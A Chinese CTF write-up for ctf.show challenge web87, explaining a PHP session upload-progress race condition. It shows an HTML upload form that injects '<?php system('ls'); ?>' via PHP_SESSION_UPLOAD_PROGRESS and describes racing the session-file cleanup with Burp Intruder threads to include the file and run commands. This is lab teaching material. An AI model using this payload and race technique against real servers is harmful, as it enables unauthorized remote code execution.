条件竞争(ctf.show web87)

关于条件竞争:

我们在 Cookie 里设置了 PHPSESSID=test,PHP 将会在服务器上创建一个文件:/tmp/sess_test,但是对于默认配置 session.upload_progress.cleanup = on,文件上传后 session 文件内容会立即被清空。因为开发者在进行代码开发时常常倾向于认为代码会以线性的方式执行,但他们忽视了并行服务器会并发执行多个线程,这就会导致意想不到的结果。线程同步机制确保两个及以上的并发进程或线程不同时执行某些特定的程序段,也被称之为临界区(critical section),如果没有应用好同步技术则会发生"竞争条件"问题。我们需要通过条件竞争,在服务器还未来得及删除我们上传的session 文件内容前,成功访问包含到该文件,实现恶意代码的命令执行。

提交表单

html 复制代码
<!DOCTYPE html>
<html>
<body>
<form action="https://9b20724b-c913-4677-87e3-84caf86b15c6.challenge.ctf.show/" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('ls'); ?>" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>

写入后更改后缀为.html即可访问,随便上传一个文件。然后抓包放到Intruder模块。

选择我们的Null payloads模式以及无限重复发送

在pool中我们的初始的线程是10

再抓一个初始访问包

一样的我们直接发送到Intruder模块 。

也是一样的设置

但是在Pool中将线程设置为30,就是一定要比之前的线程多。

攻击之后等待一会儿

发现不同长度的包,可以看到我们的条件竞争成功。

然后更改我们的指令抓取flag即可

相关推荐
xuhaoyu_cpp_java14 分钟前
SpringBoot学习(四)
java·经验分享·spring boot·笔记·学习
Eira-Z3 小时前
git(持续学习中...)
git·学习
子非鱼94273 小时前
07-Flutter 鸿蒙实战 07:故事集列表与缓存设计
学习·flutter·缓存·华为·harmonyos
fanchenxinok3 小时前
学习笔记:LabVIEW中如何将解析S19/HEX的VI封装为子VI并供主VI调用
笔记·学习·labview·子vi
2301_809051143 小时前
基本电子电路元件 学习笔记
笔记·学习
今天AI了吗4 小时前
Hermes Agent 搭建全流程:从本机试跑到可持续运行的个人 AI Agent
java·人工智能·python·学习·embedding
一只小菜鸡..5 小时前
Stanford CS144 学习笔记 (二):传输层与数据通信机制
网络·笔记·学习
超防局5 小时前
网络安全渗透测试常用工具详解
网络·安全·web安全
天选之子1235 小时前
tabulate学习
学习
子非鱼94276 小时前
06-Flutter 鸿蒙实战 06:上传后处理流程,照片识别、故事生成和状态刷新
学习·flutter·华为·harmonyos